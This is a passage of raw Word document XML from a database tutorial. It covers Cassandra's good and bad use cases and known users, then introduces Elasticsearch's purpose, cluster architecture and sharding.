      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7E6CB76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66DD82" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✓ Good Fit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4CA543" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Bad Fit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="146DD4E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C5EABA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Write-heavy (10x writes vs reads)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CAAD79" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Read-heavy with complex queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="020213C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8C47A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Known query patterns (designed upfront)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A5A6F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Ad-hoc analytical queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0083675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BDF49E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>High availability required (multi-DC)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5E08C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Strong consistency required everywhere</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="203C627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1FBB5C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Linear scalability needed (100+ nodes)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639AF3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Small dataset (&lt; 1 TB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="131B9C1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9AA216" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Time-series, IoT, messaging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48EF93" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Complex transactions (transfers, inventory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2BA54F8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40E9D7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Geographic distribution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57A6C3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Relational data with many JOINs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4816509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E8827F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Append-heavy (logs, events, metrics)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E33288" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Frequent updates/deletes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B1D9741" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Real-world Cassandra users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59406484" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Netflix: user viewing history, bookmarks (trillions of rows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165CF5DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Apple: 100K+ nodes, 10+ PB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07511E4B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Instagram: user feed storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E03D227" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Discord: message storage (trillions of messages, later migrated to ScyllaDB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A1F0C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Uber: real-time marketplace data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769E7DCB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="2D7AD266">
          <v:rect id="_x0000_i5907" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="394CD8D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 3: Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5427B94C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Elasticsearch Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC88DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Elasticsearch is a distributed, RESTful search and analytics engine built on Apache Lucene. It stores, searches, and analyzes large volumes of data in near real-time, using an inverted index as its primary data structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1AF0C7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Core purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93FD7A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016FFC7A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Elasticsearch excels at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40358EEA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Full-text search (Google-like: "fuzzy matching", relevance scoring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B8827F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Log analytics (searching through billions of log lines in seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E731F1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Real-time aggregations (faceted counts, histograms, percentiles)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217DD210" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Geospatial queries (find restaurants within 5 km)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F07591" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Autocomplete / suggestions ("Did you mean...?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB4001" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Filtering + scoring (complex multi-criteria product search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F331173" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="55312D43" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Elasticsearch is NOT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA23DED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> A primary database (no ACID transactions, eventual consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E9E18" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> A relational database (no JOINs, limited updates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073AEE6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> Good for exact key-value lookups (use Redis/DynamoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11097F88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> Good for write-heavy transactional workloads (use PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E2CF2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Elasticsearch Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BEFDA9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Cluster Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715E349" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD256A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C511F56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                    Elasticsearch Cluster                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2BF92F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05038334" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD1091" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │   Node 1     │  │   Node 2     │  │   Node 3     │      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40019119" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │ (Master-     │  │ (Data node)  │  │ (Data node)  │      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172840D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │  eligible)   │  │              │  │              │      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4BC932" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │              │  │ Index: logs   │  │ Index: logs  │      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C728E9B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │ Shard P0     │  │ Shard P1     │  │ Shard P2    │      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5AB80" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │ Shard R1     │  │ Shard R2     │  │ Shard R0    │      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D210326" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  └──────────────┘  └──────────────┘  └──────────────┘      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0682A4BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF6E1FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  P = Primary shard, R = Replica shard                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0648A65E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C231680" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key concepts: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87"/>
        <w:gridCol w:w="1780"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="280F59C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2308BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Concept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130524" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Analogy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B8FEAF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="753FE8D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F46888" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Cluster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5B148F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>The database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305BD5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Group of nodes working together</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="77E0DCC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D3B674" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Node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0B44D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>A server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5D2854" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Single Elasticsearch instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="1922E9F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82BC53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Index</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7F83B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>A table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ECA281" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Collection of related documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7158C83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772815" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>Shard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49AF07" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>A partition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CC940F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Subset of an index (a Lucene instance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="50E6A14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0675E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Replica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E5B2C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>A copy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083504" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Redundant copy of a primary shard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2281FD3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C553C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Document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2B6A88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>A row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A2C58F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Single JSON record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="1174BF2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DB9046" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">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3ACC35" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>A column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B8F3FB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>A key in the JSON document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46D5DBE9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Sharding and Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156261F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5454C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">Index: "products" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10447A22" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Settings: 3 primary shards, 1 replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0E344F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="71F978E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Result: 6 total shards (3 primary + 3 replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F9388" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Primary 0 → Node 1,  Replica 0 → Node 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB6DA6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Primary 1 → Node 2,  Replica 1 → Node 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DA3759" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Primary 2 → Node 3,  Replica 2 → Node 2</w:t>
      </w:r>
    </w:p>
